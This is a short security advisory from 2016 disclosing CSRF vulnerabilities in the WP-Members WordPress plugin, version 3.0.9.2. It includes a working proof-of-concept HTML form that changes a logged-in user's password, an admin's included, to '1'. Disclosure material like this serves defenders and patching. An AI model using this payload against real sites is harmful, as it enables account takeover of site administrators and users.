WP-Members [CSRF]

Description

WP-Members plugin is vulnerable to CSRF attack for the following user-relative actions:

• Login
• Logout
• Password Change (change password for the current user)
• Password Reset (send a password reset link to user’s email)
• Get Username (finds user by email and emails username to user’s email)

From the above actions the most dangerous one is password change. An attacker could exploit this vulnerability to change admin’s password with obvious consequences.

PoC

The following form will change user’s password to 1.

<form action="//wp1.dev/index.php" method="post">
    <input type="hidden" name="formsubmit" value="1">
    <input type="hidden" name="pass1" value="1">
    <input type="hidden" name="pass2" value="1">
    <input type="hidden" name="a" value="pwdchange">
    <input type="submit" value="Press Me">
</form>

---

WordPress Plugins CSRF

---

INFO

• 24 March 2016
• Pan Vag
• butlerblog.com
• WP-Members
• 3.0.9.2
• WordPress 4.4.2
• DWF-2016-87018